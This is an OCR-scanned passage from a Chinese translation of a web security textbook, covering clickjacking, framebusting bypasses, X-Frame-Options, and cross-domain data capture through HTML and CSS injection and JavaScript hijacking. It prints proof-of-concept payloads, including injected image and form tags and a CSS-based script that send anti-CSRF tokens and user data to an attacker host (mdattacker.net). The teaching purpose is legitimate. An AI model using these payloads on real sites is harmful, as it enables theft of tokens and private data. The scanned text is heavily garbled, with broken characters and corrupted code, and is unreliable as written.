在 UI 伪装 攻击 中 ， 攻 击 者 的 页 面 在 此 过 程 中 使 用 传统 的 CSRF 提 交 第 一 个 请 求 。 提 交 过 程 在 
攻击 者 页 面 内 的 iframe 中 和 完成。 和 正常 情况 下 一 样 ， 应 用 程序 会 作出 啊 应 ， 返 回 要 添加 的 用 户 
的 详细 信息 , 以 及 一 个 用 于 确认 该 操作 的 按钮 。 此 啊 应 将 在 攻击 者 的 1frame 中 “显示 ”, 该 iframe 
已 由 攻击 者 的 界面 禾 善 ， 该 界面 旨 在 户 使 受害 用 户 单 击 包 含 “ 确 认 ” 按 钮 的 区 域 。 如 条 用 户 在 此 
区 域 单 击 ， 他 将 在 不 知情 的 情况 下 单 击 目标 应 用 程序 中 的 “确认 ”按钮 ， 从 而 创建 新 用 户 。 这 种 
基本 的 攻击 如 图 13-1 所 示 。 

这 种 攻击 之 所 以 能 够 在 纯粹 的 CSRF 攻 击 无 法 奏效 的 情况 下 取得 成 功 ， 是 因为 应 用 程序 使 用 
的 反 CSRF 令 脾 以 正 委 方式 得 到 人 处理 。 虽 然 由 于 同 源 策 略 的 原因 ， 攻 击 者 的 页 面 无 法 读 取 该 令 脾 
的 值 ， 但 攻击 者 的 iframe 中 的 表单 包含 了 由 应 用 程序 生成 的 令 牌 ， 在 受害 用 户 不 知情 的 情况 下 
单 击 “确认 ”按钮 时 ， 这 个 令 牌 被 返 交 给 应 用 程序 。 在 目标 应 用 程序 看 来 ， 一 切 都 很 正 稍 。 

要 实施 欺骗 ， 即 让 受害 用 户 虽 然 看 到 一 个 界面 , 但 实际 上 却 与 为 一 个 界面 交互 , 攻击 者 可 以 
采用 各 种 CSS 技 术 。 加 载 目 标 应 用 程序 的 iframe 可 以 为 任意 大 小 ， 位 于 攻击 者 页 面 中 的 任何 位 
置 ， 并 显示 目标 页 面 的 任意 位 置 。 使 用 适当 的 样式 属性 ， 可 以 令 该 iframe 变 得 完全 透明 ， 从 而 
使 其 对 用 户 不 可 见 。 
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图 13-1 基本 的 UI 伪装 攻击 


尝试 访问 
http://mdsec.net/auth/405/ 








如 果 进 一 步 扩 展 上 述 基本 攻击 , 攻击 者 可 以 在 其 界面 中 使 用 复杂 的 脚本 代码 ,以 户 使 受害 用 
户 执行 更 加 复杂 的 操作 ， 而 不 仅仅 是 单 击 按钮 。 比 方 说 ， 要 实施 攻击 ， 需 要 诱 使 用 户 在 输入 字段 
( 如 转账 页 面 的 “金额 ”字段 ) 中 输入 一 些 文本 。 在 这 种 情况 下 ， 攻 击 者 可 以 在 其 用 户 界 面 中 包 
含 一 些 诱 使 用 户 输入 文本 的 内 容 ， 如 用 于 输入 电话 号 人 码 以 赢得 奖励 的 表单 。 然 后 ,攻击 者 的 页 面 
中 的 脚本 可 以 对 进行 键 击 选择 性 处 理 , 在 用 户 输入 相关 字符 时 , 将 键 击 操作 有 效 传递 到 目标 界面 ， 
从 而 填写 所 需 的 输入 字段 。 如 采用 户 输入 攻击 者 不 希望 在 目标 界面 中 输入 的 字符 , 该 键 击 将 不 会 
传递 给 目标 界面 ， 攻 击 者 的 脚本 将 等 竺 下 一 次 键 击 。 

另外 , 攻击 者 的 页 面 中 可 以 包含 诱 使 用 户 执行 拖 动 鼠标 操作 〈 束 像 玩 价 单 的 洲 戏 一 样 ) 的 内 
容 。 随 后 , 在 攻击 者 的 页 面 中 运行 的 脚本 将 选择 性 地 处 理 生成 的 操作 , 使 用 户 在 不 知情 的 情况 下 
选择 目标 应 用 程序 界面 中 的 文本 ,并 将 其 拖 动 到 攻击 者 的 界面 中 的 输入 字段 中 (或 相反 )。 例 如 ， 
在 针对 Web 邮 件 应 用 程序 实施 攻击 时 , 攻击 者 可 以 诱 使 用 户 将 电子 邮件 中 的 文本 拖 动 到 其 能 够 读 
取 的 输入 字段 中 。 或 者 ,攻击 者 可 以 诱 使 用 户 建立 某 种 规则 ,向 某 转 发 所 有 电子 邮件 ,并 将 所 需 
电子 邮件 地 址 从 攻击 者 的 界面 拖 动 到 定义 该 规则 的 表单 的 相关 输入 字段 中 。 此 外 ， 由 于 链接 和 图 
像 均 可 以 作为 URL 进 行 拖 动 , 攻击 者 其 至 可 以 通过 诱发 拖 动 操作 从 目标 应 用 程序 的 界面 中 拦截 敏 
感 URL， 包 括 反 CSRF 令 有 牌 。 

有 关 这 些 和 其 他 攻击 癌 量 ， 及 其 实施 方法 的 详细 说 明 ， 请 参阅 以 下 文档 : 


http://uil-redressing.mniemietz.de/uiRedressing.pdf 
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1. “破坏 框架 ”防御 

在 UI 伪 痰 攻击 最 初 受 到 广泛 关注 时 ， 许 多 知名 的 Web 应 用 程序 寻求 采用 一 种 称 为 破坏 框架 
( framebusting ) 的 技术 来 防范 这 类 攻击 。 在 某 些 情况 下 ， 这 种 技术 已 用 于 防范 其 他 基于 框 以 的 
Es 

破坏 框 染 可 以 表现 为 各 种 形式 , 但 基本 上 , 它 是 指 每 个 相关 的 应 用 程序 页 面 都 会 运行 一 段 脚 
本 来 检测 目 己 是 否 被 加 载 到 iframe 中 。 如 果 是 ， 应 用 程序 会 答 试 “破坏 ”该 itrame ， 或 执行 其 
他 防御 性 操作 ， 如 重 定 回 到 错误 页 面 或 拒绝 显示 应 用 程序 目 己 的 界面 。 

斯 坦 福 大 学 2010 年 的 一 项 研究 表明 ， 排 名 前 500 的 网 站 均 采 用 了 “破坏 框架 ”防御 技术 。 同 
时 ,这 项 研究 还 发 现 , 这 些 防御 都 可 以 通过 某 种 方式 突破 。 突 破 这 种 防御 的 方法 因 每 种 防御 的 实 
施 细 节 而 异 ， 下 面 我 们 通过 一 段 “破坏 框架 ”示例 代码 来 加 以 说 明 : 























<ScCript> 
If {top.location != self.location) 
{ top.location = self.location } 
</Script> 








这 段 代 码 检查 页 面 本 身 的 URL 与 浏览 器 窗口 中 的 顶部 框架 的 UREL 是 和 否 匹 配 。 如 果 不 匹 

配 ， 则 说 明 页 面 已 加 载 到 子 框架 内 。 在 这 种 情况 下 ,脚本 会 尝试 将 页 面 重新 加 载 到 窗口 内 的 

顶层 框架 中 ， 从 而 “逃离 ”该 框架 。 

实施 UI 伪装 攻击 的 攻击 者 可 以 通过 各 种 方式 避 开 这 种 防御 ， 将 目标 页 面 成 功 般 入 框架 。 

口 由 于 攻击 者 的 页 面 控 制 着 顶层 框架 , 因而 可 以 重新 定义 top.1location 的 含义 , 在 子 框架 
尝试 引用 它 时 导 人 臻 异常。 例如 ， 攻 击 者 可 以 在 Internet Explorer 中 运行 以 下 代码 : 

War LOGation = "F600; 
这 上 段 代码 将 location 重 新 定义 为 项 层 框架 中 的 本 地 变量 ,在 子 框架 中 运行 的 代码 无 
法 访问 该 变量 。 

口 顶层 框架 可 能 会 钓 住 window.onbeforeunload 事 件 ， 从 而 在 “人 破坏 框架 ”代码 尝试 设 
置顶 层 框架 的 位 置 时 运行 攻击 者 的 事件 处 理 程序 。 这 时 ， 攻 击 者 的 代码 可 以 对 返回 HTTP 
204 (无 内 容 ) 啊 应 的 URL 执 行进 一 步 的 重 定 癌 。 这 会 导致 浏览 锅 取 消 重 定 回 调用 链 ， 使 
顶层 框架 的 URL 保 持 不 变 。 

口 顶层 框架 可 以 在 将 目标 应 用 程序 加 载 到 子 框 保 中 时 定义 sandbox 属 性 。 这 会 在 子 框架 中 
禁用 脚本 ， 同 时 将 其 cookie 保 持 为 启用 状态 。 

口 如 第 12 草 所 述 ， 顶 层 框架 可 以 利用 IE XSS 过 滤器 在 子 框架 中 选择 性 的 禁用 “破坏 框架 ” 
脚本 。 当 攻击 者 的 页 面 指定 iframe 目 标的 URL 时 ， 可 以 创建 一 个 新 参数 ， 在 参数 值 中 包 
含 一 段 适当 的 “破坏 框架 ”脚本 。I XSS 过 波 需 将 标识 该 参数 值 及 目标 应 用 程序 返回 的 
啊 应 中 的 脚本 代码 ， 并 禁用 啊 应 中 的 脚本 ， 设 法 为 用 户 提供 保护 。 






































尝试 访问 
http://mdsec.net/auth/406/ 
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2. 防止 UI 伪装 

目前 , 业界 普 裔 认为 , 虽然 一 些 类 型 的 “破坏 框架 ”代码 可 以 在 一 定 程度 上 阻止 UI 伪装 攻击 ， 
但 绝 不 能 将 这 种 技术 作为 防 郊 UI 伪装 攻 击 的 万 全 之 入。 

要 防止 攻击 者 将 应 用 程序 页 面 般 入 框架 ,一 种 更 加 可 徘 的 方法 是 使 用 Xx-Frame-Options 咯 
应 消息 头 。 该 消息 头 由 Internet Explorer 8 引入 ， 随后 ， 许 多 其 他 流行 的 浏览 需 也 开始 采用 这 种 方 
法 。X-Frame-Options 消 息 头 可 以 接受 两 个 值 。 值 aeny 指 示 浏 览 融 防止 页 面 被 答 人 框架 ， 值 
sameorigin 指 示 浏 览 颖 防止 第 三 方 域 执 行 “ 黄 入 框架 ”操作 。 




















提示 “在 分 析 应 用 程序 采用 的 任何 反 谈 入 框架 防御 时 ， 应 始终 检查 适用 于 移动 设备 的 
Y 界面 的 任何 相关 版 本 。 例如 ， 虽然 yahh-app.com/chat/ 能 够 可 靠 地 防范 髓 入 框架 攻 
击 ， 但 wahh-app.com/mobile/chat/ 可 能 并 不 提供 此 类 防御 。 在 设计 反 嵌 入 框架 防 
御 时 ， 应 用 程序 开发 者 通常 会 忽略 用 户 界 面 的 移动 版 本 ， 这 可 能 是 因为 他 们 认为 UI 伪 


装 攻 击 无 法 在 移动 设备 上 实施 。 但是， 许多 情况 下 ， 在 使 用 标准 ( 非 移动 ) 浏览 器 访 
问 时 ， 移 动 版 本 的 应 用 程序 仍然 能 够 正常 运行 ， 并 且 用 户 会 话 可 以 在 移动 和 非 移动 版 
本 的 应 用 程序 之 间 共 享 。 
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同 源 策略 则 在 防止 在 一 个 域 中 运行 的 代码 访问 由 其 他 域 提 供 的 内 容 。 因此, 器 站 点 请 求 伪造 
攻击 通 稼 被 称 为 “ 单 问 ”攻击 。 虽 然 一 个 域 可 以 同 必 一 个 域 提供 请 求 ， 但 它 很 难 谈 取 这 些 请 求 的 
啊 应 ， 从 而 从 其 他 域 中 贸 取 用 户 数据 。 

实际 上 ,在 茶 些 情况 下 ， 有 各 种 攻击 技巧 可 用 于 从 其 他 域 中 捕获 整个 或 部 分 啊 应 。 通 笛 ,， 这 
些 攻击 会 对 目标 应 用 程序 东方 面 的 功能 及 稼 见 浏 览 套 的 某 个 功能 加 以 综合 利用 , 从 而 突破 同 源 策 
略 防 御 ， 实 现 路 域 捕获 数据 的 目的 。 











13.2.1 通过 注入 HTML 捕 获 数据 


与 利用 XSS 漏 洞 不 同 ， 攻 击 者 可 以 利用 许多 应 用 程序 提供 的 功能 , 在 其 他 用 户 收 到 的 响应 中 
注入 一 段 有 限 的 HIML。 例 如 ，Web 邮 件 应 用 程序 可 能 会 显示 包含 某 个 HTML 标 记 的 电子 邮件 ， 
但 会 阻止 可 用 于 执行 脚本 代码 的 任何 标签 和 属性 ,。 或 者 , 动态 生成 的 错误 消息 可 能 会 过 滤 一 系列 
表达 式 ， 但 仍然 允许 有 限 使 用 HTML。 

在 这 些 情况 下 , 就 可 以 利用 HTML 注 入 条 件 回 攻击 者 所 在 的 域 发 送 页 面 中 的 敏感 数据 。 例 如 ， 
在 Web 邮 件 应 用 程序 中 ,攻击 者 或 许可 以 捕获 私人 电子 邮件 的 内 容 。 或 者 ， 攻 击 者 也 许可 以 读 取 
页 面 中 使 用 的 反 CSRE 令 牌 ， 从 而 实施 CSRF 攻 击 ， 将 用 户 的 电子 邮件 转发 到 任意 地 址 。 

以 一 个 允许 攻击 者 在 以 下 响应 中 注入 有 限 的 HTML 的 Web 邮 件 应 用 程序 为 例 : 


[ limited HTMI injection here | 
<form action="http://wahh-mail.com/forwardemalil" method="POST"> 
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<input type="hidden" name='"nonce" value="2230313740821"> 


<input type="submit" value="Forward"> 

</form> 

5 

var StatsTrackerId='AARE78F27CB3210D'; 

a 

在 注入 点 之 后 ， 页 面包 含 了 一 个 提供 CSRF 令 牌 的 HTIML 表 单 。 在 这 种 情况 下 ， 攻 击 者 可 以 
在 上 述 啊 应 中 注入 以 下 文本 : 

<img src='http://mdattacker.net/capture?html-= 

这 段 HTMIL 将 打开 一 个 指向 攻击 者 域 中 的 URL 的 图 像 标 签 。 该 URL 包 含 在 单 引 号 内 , 但 URL 
字符 串 并 未 终止 ，<img> 标 签 也 没有 结束 。 这 会 导致 浏览 硕 将 注 和 人 点 之 后 的 文本 视 为 UREL 的 一 部 
分 , 直到 遇 到 单 引 号 , 也 就 是 啊 应 中 随后 出 现 引 用 的 JavaScript 字 人 符 串 的 位 置 。 浏 览 硕 接 受 各 种 皇 
人 了 衬 件 ， 也 允许 URL 跟 越 多 行 。 

用 户 的 浏览 各 处 理 攻击 者 注入 的 啊 应 时 , 它 会 尝试 提取 指定 的 图 像 ,并 癌 以 下 URL 提 出 请 求 ， 
从 而 向 攻击 者 的 域 中 发 送 敏感 的 反 CSRF 令 牌 : 


http://mdattacker.net/capture?html=<form®%20action="http://wahh-mail.com/ 




















forwardemail"%20method="POST"><input%20type="hidden"%20name="nonce"%®S20value= 

"2230313740821"><input%20type="submit'"%®%20value="Forward">...</form>... 

<SCript> var%®20 StatsTrackerId= 

男 一 个 攻击 可 以 注入 以 下 文本 : 

<form action="http://mdattacker.net/capture" method="POST"> 

此 攻击 在 应 用 程序 本 刁 使 用 的 <form> 标 签 之 前 注入 一 个 指定 攻击 者 域 的 <form> 标 签 。 在 这 
种 情况 下 ， 浏 览 硕 在 遇 到 通信 的 <form> 标 签 时 ， 它 们 将 忽略 该 标签 ， 并 在 遇 到 第 一 个 <form> 标 
签 的 情况 下 处 理 表 单 。 因 此 ， 如 采用 户 提交 表单 ， 表 单 的 所 有 参数 ， 包 括 敏感 的 反 CSRF 令 牌 ， 
将 被 提交 到 攻击 者 的 服务 硕 中 : 

POST /capture HTTP/1.1 

Content-Type: application/x-www-form-urlencoded 


Content-Length: 192 


Host: mdattacker.net 

















nonce=2230313740821&... 
由 于 上 述 第 二 个 攻击 仅 注 入 了 格式 正常 的 HTML, 因此 能 够 更 有 效 地 避 开 那些 旨 在 允许 回 显 的 输 
入 中 的 HIML 子 集 的 过 滤 。 但 是 这 种 攻击 也 需要 用 户 干 预 ， 在 某 些 情况 下 ， 这 可 能 会 降低 它 的 效率 。 


13.2.2 ”通过 注入 CSS 捕 获 数 据 
在 上 一 节 的 示例 中 , 攻击 者 需要 在 注入 的 文本 中 使 用 有 限 的 HTML 标 记 , 才能 跨 域 捕获 部 分 


响应 。 但 是 , 许多 时 候 , 应 用 程序 会 阻止 或 对 注入 的 输入 中 的 < 和 > 字符 进行 HTML 编 码 ， 防 止 攻 
击 者 插入 任何 新 的 HTML 标 签 。Web 应 用 程序 中 大 多 存在 此 类 纯 文 本 注入 条 件 ， 并 且 人 们 通常 认 
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为 这 种 条 件 不 会 造成 危险 。 

例如 ， 在 一 个 Web 邮 件 应 用 程序 中 ， 攻 击 者 可 以 通过 电子 邮件 主题 行 在 目标 用 户 的 响应 中 注 
入 有 限 的 文本 。 在 这 种 情况 下 ， 攻 击 者 可 以 通过 在 应 用 程序 中 注入 CSS 来 跨 域 捕获 敏感 数据 。 

在 上 述 示 例 中 ， 假 设 攻击 者 发 送 市 以 下 主题 行 的 电子 邮件 : 

{}*{font-family:’! 

由 于 其 中 不 包含 任何 HTML 元 字符 ,大 多 数 用 户 都 接受 并 在 收 件 人 用 户 的 啊 应 中 显示 这 段 代 
码 。 这 时 ， 返回 给 用 户 的 啊 应 可 能 与 以 下 内 容 类 似 : 

<html> 

<head> 

<title>WahhMail Inbox</title> 


</head> 
<body> 




















<td>{}*{font-family:'</td> 


<form action="http://wahh-mail.com/forwardemail" method="POST"> 
<input type="hidden’" name="nonce”" value="2230313740821"> 
<input type="submit" value="Forward"> 


</ form> 
<Script> 
var StatsTrackerId='AARE78F27CB3210D'; 


</SCript> 

</body> 

</html> 

很 明显 ， 此 啊 应 中 包含 HTML。 但 奇怪 的 是 ， 浏览 絮 将 该 啊 应 加 载 为 CSS 样 式 表 ,将 正常 处 
理 其 中 包含 的 任何 CSS 定 义 。 在 这 段 代码 中 ,注入 的 啊 应 定义 了 CSS font-family 属 性 , 并 将 一 
个 引用 的 字符 串 作 为 属性 定义 。 攻击 者 注入 的 文本 并 未 终止 该 字符 串 ， 因 此 ,该 字符 串 会 一 直 持 
续 到 啊 应 的 剩余 部 分 ， 包 括 包含 敏感 的 反 CSRF 令 牌 的 隐藏 表单 字段 。( 请 注意 ，CSS 定 义 不 需 要 
被 引用 。 但 是 ， 如 果 没 有 引用 CSS 定 义 ， 它 们 可 能 会 在 下 一 个 分 号 位 置 终 止 ， 而 该 分 号 可 能 出 现 
在 攻击 者 布 望 捕获 的 敏感 数据 之 前 。) 

要 利用 这 种 行为 ， 攻 击 者 需要 在 上 自己 的 域 中 创建 一 个 页 面 ， 在 其 中 包含 CSS 样 式 表 形式 的 注 
入 啊 应 。 这 会 在 攻击 者 自己 的 页 面 中 应 用 任何 舱 入 的 CSS 定 义 。 然 后 ,攻击 者 可 以 使 用 JavaScript 
来 查询 这 些 定义 ， 从 而 检索 捕获 的 数据 。 例 如 ， 攻 击 者 可 以 创建 一 个 包含 以 下 内 容 的 页 面 : 


<link rel="stylesheet" href="https://wahh-—mail.com/inbox”" type="text/ 


























CSS"> 
<Script> 

document .write!(’'<img src="http://mdattacker.net/capture?’' + 
escape (document.body.currentStyle.fontFamily) + ">'); 


</Script> 
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此 页 面包 含 来 日 Web 邮 件 应 用 程序 的 表示 为 样式 表 的 相关 URL， 并 运行 脚本 来 查询 
font-family 属 性 ， 该 属性 已 在 Web 邮 件 应 用 程序 的 响应 中 定义 。 人 然后，font-family 属 性 的 
值 ， 包 括 敏感 的 反 CSRF 令 牌 ， 将 通过 针对 以 下 UREL 的 、 动 态 生 成 的 请 求 传 送 到 攻击 者 的 服务 
器 中 

http://mdattacker.net/capture?®27%3C/td%3ES0DS0OA. ..%0DSO0AS3Cform®%20 

action%3D%22 http%3A//wahh-mail.com/forwardemail%®22%20method%3D%22POSTS%S2 

2%3E%0D%SOAS3Cinput$S2 Otype®s3D%S22hidden%22%20name%3D%22nonce%22%20values%S3 

D%S222230313740821%22%3E%S0D %0A%S3Cinput%20type%®%3D%®S22submit%®22%20values%®S3Ds% 

22Forward%22%3E%0D%SO0A. ..%0D%O0A%S3C/ form%3ESO0D$S$OA.. .$0O0D%SO0AS3Cscript%3E%0D 

SO0Avar®20 StatsTrackerId%®%3D%27AAE78F27CB32 10D%27 


此 攻击 可 在 当前 版 本 的 Internet Explorer 上 实施 。 为 防止 这 种 攻击 ， 其 他 浏览 硕 已 修改 了 它们 
处 理 CSS 的 方式 ， 将 来 IE 也 可 能 会 这 样 做 。 









































13.2.3 JavaScript 动 持 


JavaScript 动 持 提 供 了 男 一 种 跨 域 捕获 数据 的 方法 ， 从 而 将 CSRF 转 换 为 一 种 有 限 的 “ 双 问 ” 
攻击 。 如 第 3 莉 所 述 ， 同 源 案 略 允 许 一 个 域 包含 其 他 域 的 脚本 代码 ， 并 且 该 代码 可 以 在 调用 域 、 
而 不 是 发 布 域 中 运行 。 只 要 可 执行 的 应 用 程序 啊 应 使 用 仅 包 含 非 敏感 代码 (可 由 任何 应 用 程序 用 
户 访 问 的 静态 代码 ) 的 跨 域 脚本 ， 这 种 规定 就 不 会 造成 危险 。 但 是 , 今天 的 许多 应 用 程序 都 使 用 
JavaScript 来 传输 敏感 数据 , 并且 其 传输 方式 并 不 受 同 源 末 上 略 的 限制 。 此外， 随 着 浏览 妖 技 术 的 发 
展 ， 许 多 语法 都 可 以 作为 有 效 的 JavaScript 执 行 ， 这 为 跨 域 捕获 数据 提供 了 新 的 机 会 。 

应 用 程序 设计 方面 的 变化 (归于 宽 沁 的 “2.0” 概 念 ) 也 为 使 用 JavaScript 从 服务 磊 问 客户 站 
传输 敏感 数据 提供 了 新 的 方法 。 许 多 时 候 ， 要 通过 回 服 务 需 提供 异步 请 求 更 新 用 户 界 面 ， 一 种 快 
速 有 效 的 方法 ， 是 动态 插入 脚本 代码 ， 并 在 其 中 以 某 种 形式 包含 需要 显示 的 特定 的 用 户 数 据 。 

在 这 一 方 中 , 我 们 将 介绍 各 种 使 用 动态 执行 的 脚本 代码 来 传输 敏感 数据 的 方法 。 同 时 ， 我们 
还 将 说 明 如 何 动 持 这 类 代码 ， 以 捕获 其 他 域 中 的 数据 。 

1. 函数 回调 

以 一 个 应 用 程序 为 例 , 它 在 当前 用 户 单 击 相应 的 选项 卡 时 , 在 用 户 界 面 中 显示 该 用 户 的 个 人 
信息 。 为 提供 无 颖 的 用 户 体验 ， 应 用 程序 使 用 异步 请 求 提 取 用 户 信 息 。 当 用 户 单 击 “ 个 人 资源 ” 
选项 卡 时 ， 某 段 客户 端 代码 将 动态 包含 以 下 脚本 : 

https://mdsec.net/auth/420/YourDetailsJson.ashx 


针对 此 URL 的 啊 应 包含 一 个 也 数 回调 ， 该 函数 在 UI 中 显示 用 户 个 人 资料 。 

































































'Role', 'User' |] 


showUserinfo!l 
[ 
[ 'Name', ' Matthew Adamson' 】]， 
[ 'Username', 'adammatt' ]， 
[ 'Password', '4nliliub3"' ]， 
[ 'Uid', 88 ]， 
[ 


下 
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在 这 种 情况 下 ， 攻 击 者 可 以 创建 一 个 执行 showUsezInfo 困 数 的 页 面 ， 并 在 其 中 包含 传送 个 
人 信息 的 脚本 ， 从 而 捕获 用 户 的 个 人 资源 。 一 个 简单 的 概念 验证 攻击 如 下 所 示 : 


<Script> 





function showUserIinfo(x) 1{ alert(x); } 
</Script> 





<Script src="'https://mdsec.net/auth/420/YourDetaillsJson.ashx'"> 
</Script> 


如 果 用 户 在 访问 攻击 者 的 页 面 的 同时 , 还 登录 了 菏 个 易 受 攻击 的 应 用 程序 , 则 攻击 者 的 页 面 
将 动态 插 人 包含 用 户 个 人 信息 的 脚本 。 该 脚本 将 调用 showUserInfo 函 数 ， 由 攻击 者 实施 时 ， 它 
将 接收 用 户 的 个 人 资料 ， 包 括 用 户 的 密码 ( 如 本 例 所 示 )。 


尝试 访问 


http://mdsec.net/auth/420/ 











2. JSON 

下 面 我 们 对 上 一 个 示例 稍 做 修改 , 应 用 程序 将 不 再 在 动态 调用 的 脚本 中 执行 函数 回调 ,而 是 
返回 包含 用 户 个 人 资料 的 JSON 数 组 . 

[ 








[ :Name’', ’'Matthew Adamson’ ]， 

[ ‘Username’', ‘'adammatt’ ]， 

[ :Password’', '4nl1lub3' ]， 

[ :Uid’':, '88' ]， 

[ ‘ROle’', ‘User’' | 
] 
如 第 3 章 所 述 ，JSON 是 一 种 灵活 的 数据 表示 形式 ， 并 且 可 以 由 JavaScript 解 释 器 直接 处 理 。 
在 旧版 本 的 Firefox 中 , 攻击 者 可 以 执行 一 次 跨 域 脚本 包含 攻击 , 通过 和 窗 亲 JavaScript 中 的 默认 

Arravy 构 造 另 数 来 捕获 这 些 数据 。 例 如 : 


<Script> 








function capture(s) f 


alert's); 
} 
function Array()} { 
for (var 1 = 0; 1 < 5; 1++) 
this[i] setter = capture; 
} 
</Script> 





<script src="https://mdsec.net/auth/409/YourDetailsJson.ashx"> 
</Script> 


此 攻击 修改 默认 的 Array 对 和 象 ， 并 定义 一 个 定制 的 setter 函 数 (在 为 数组 中 的 元 系 分 配 值 
时 将 调用 该 函数 )。 然 后 ， 它 执行 包含 JSON 数 据 的 啊 应 。JavaScript 解 释 融 将 处 理 这 些 JSON 数 据 ， 
构造 一 个 Array 来 保存 它们 的 值 ， 并 对 数组 中 的 每 个 值 调用 攻击 者 定制 的 setter 困 数 。 
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由 于 此 类 攻击 已 于 2006 年 被 发 现 , 因而 开发 者 已 对 Firefox 进 行 了 修改 ,以 防止 在 数据 初始 化 
过 程 中 调用 定制 的 setter 函 数 。 此 攻击 无 法 在 当前 版 本 的 浏览 瘟 中 实施 。 


http://mdsec.net/auth/409/ 
要 利用 本 示例 ， 请 下 载 2.0 版 本 的 Firefox。 请 从 以 下 URL 下 载 该 版 本 的 Firefox: 
www.oldapps.com/firefox.php?old firefox=26 





3. 变量 分 本 

以 一 个 社交 网 络 应 用 程序 为 例 , 该 应 用 程序 大 量 使 用 异步 请 求 来 执行 各 种 操作 , 如 更 新 状态 、 
添加 好 友和 发 布 评论 。 为 提供 快速 无 颖 的 用 户 体验 ， 一 部 分 用 户 界 面 使 用 动态 生成 的 脚本 加 载 。 
为 防止 标准 的 CSRF 攻 击 ， 这 些 脚本 中 包含 了 反 CSRE 令 牌 ， 以 便 在 执行 敏感 操作 时 使 用 。 利 用 在 
动态 脚本 中 插入 这 些 令 牌 导致 的 漏洞 ， 攻 击 者 可 以 通过 跨 域 包 含 相 关 肢 本 来 捕获 令 脾 。 

例如 ， 假 设 wahh-network.com 上 的 应 用 程序 返回 包含 以 下 代码 的 脚本 : 





























var nNnonce = '222230313740821': 


一 个 用 于 跨 域 捕获 nonce 值 的 简单 概念 验证 攻击 如 下 所 示 : 
<Script src="https://wahh-network.com/status"> 
</Script> 
<Script> 

alert inonce): 
</Script> 


在 另 一 个 示例 中 ,， 令 牌 的 值 在 因数 中 进行 分 配 : 
function setSstatus (status) 


{ 





nonce = '222230313740821'， 


} 
这 时 ， 攻 击 者 可 以 实施 以 下 攻击 : 
<Script src="https://wahh-network.com/status"> 
</Script> 
<Script> 
setstatus{('a'): 
alert (nonce) : 
</Script> 


针对 不 同 的 变量 分 配 情形 ， 攻 击 者 可 以 采用 各 种 其 他 技巧 。 在 茶 些 情况 下 ， 攻 击 者 可 能 
需要 在 一 定 程 度 上 模仿 目标 应 用 程序 的 客户 端 逻 辑 ， 才 能 包含 该 程序 的 部 分 脚本 并 捕获 敏感 
数据 。 
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4. E4X 

就 在 不 久之 前 ，E4X 成 为 一 个 快速 发 展 的 领域 ,为 应 对 在 各 种 实际 应 用 程序 中 发 现 的 各 种 可 
利用 条 件 ， 开 发 者 一 直 在 对 浏览 器 进行 更 新 。 

E4X 是 对 ECMAScript 襄 言 ( 包括 JavaScript ) 的 扩展 ， 后 者 可 为 XML 语言 添加 本 地 文 择 。 目 
前 ， 当 前 厂 本 的 Firefox 浏 览 硕 已 实施 了 E4X。 尽 管 其 中 的 漏洞 已 经 修复 ， 但 Firefox 在 E4X 的 处 理 
方式 上 仍 存在 漏洞 ， 可 用 于 跨 域 捕获 数据 。 

除了 允许 在 JavaScript 中 下 接 使 用 XML 语 法 外 ， 用 户 还 可 以 在 E4X 舱 入 代码， 以 调用 XML 中 
的 JavaScript: 











Var foo=<bar>{prompt('Please enter the value of bar.')}</bar>: 

E4X 的 这 些 特性 导致 了 两 个 严重 的 后 果 ， 可 用 于 实施 跨 域 数据 捕获 攻击 : 

口 结构 正确 的 XML 标记 将 被 视 为 不 会 分 配给 任何 变量 的 值 ; 

口 藤 入 {. ..} 块 中 的 文本 将 作为 JavaScript 执 行 ， 用 于 对 XML 数据 的 相关 部 分 进行 初始 化 。 

许多 结构 正确 的 HTML 也 是 结构 正确 的 XML， 意 味 着 它们 可 以 由 E4X 进 行 处 理 。 此 外 ,许多 
HTML 都 在 {...} 块 中 包含 提供 敏感 数据 的 脚本 代码 。 例 如 : 


<htm]l>»> 





<head> 
<Script> 


function setNoncet{) 
{ 

nonce = '222230313740821'; 
} 


</Script> 
</head> 
<body> 


</body> 

</html> 

在 早期 版 本 的 Firefox 中 ， 攻 击 者 可 以 对 类 似 于 上 面 的 完整 HIML 员 应 执行 览 域 脚本 包含 ， 并 
在 目 己 的 域 中 执行 一 些 舱 入 式 JavaScript 代 人 码 。 

此 外 ,利用 与 之 前 所 述 的 CSS 注 入 攻击 类 似 的 技巧 ,攻击 者 有 时 可 以 在 目标 应 用 程序 的 HTML 
啊 应 中 的 适当 位 置 注入 文本 ,在 该 啊 应 中 的 敏感 数据 周围 插入 任意 的 {...} 块 。 然 后， 攻击 者 可 
以 跨 域 包含 整个 响应 ， 将 其 作为 脚本 执行 ， 以 捕获 其 中 包含 的 数据 。 

上 述 任何 一 种 攻击 都 可 以 在 当前 版 本 的 浏览 瘟 中 实施 。 随 痢 这 个 过 程 不 断 继 续 , 浏览 硕 对 于 
最 新 语法 结构 的 文 持 也 进一步 扩展 , 在 新 的 浏览 带 功 能 推出 之 前 , 针对 不 易于 受到 上 述 攻 击 的 应 
用 程序 ， 很 可 能 会 出 现 新 型 器 域 数 据 捕 获 攻击 。 

5. 防止 JavaScript 动 持 

实施 JavaScript 动 持 攻 击 必 须 满 足 几 个 前 提 条 件 。 因 此 , 要 防止 这 种 攻击 ,必须 违反 其 中 至 少 
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一 个 前 提 条 件 。 要 获得 深层 保护 ， 我 们 建议 在 防御 攻击 时 同时 采用 多 种 防范 措施 。 

口 至 于 执行 敏感 操作 的 请 求 ， 应 用 程序 应 使 用 标准 的 反 CSRF 防 御 来 阻止 跨 域 请 求 返 回 任何 
包含 敏感 数据 的 响应 。 

口 当 应 用 程序 从 它 自 己 的 域 中 动态 执行 JavaScript 代 码 时 , 并 不 仅 限 于 使 用 <script> 标 签 来 
包含 脚本 。 因 为 请 求 为 本 站 请 求 ， 客 户 端 代码 可 以 使 用 xMLHttpRequest 检 索 原 始 啊 应 
并 进行 其 他 处 理 ， 然 后 再 将 其 作为 脚本 执行 。 这 意味 着 ， 应 用 程序 可 以 在 啊 应 的 开始 音 
分 插入 无 效 或 有 问题 的 JavaScript， 客 户 端 应 用 程序 在 处 理 脚 本 前 ， 将 会 删除 这 些 内 容 。 
例如 ， 以 下 脚本 在 使 用 脚本 包含 执行 时 将 导致 无 限 循环 ,但 如 果 使 用 xMLHttpRequest 
访问 ， 则 可 以 在 执行 之 前 删除 : 

下 

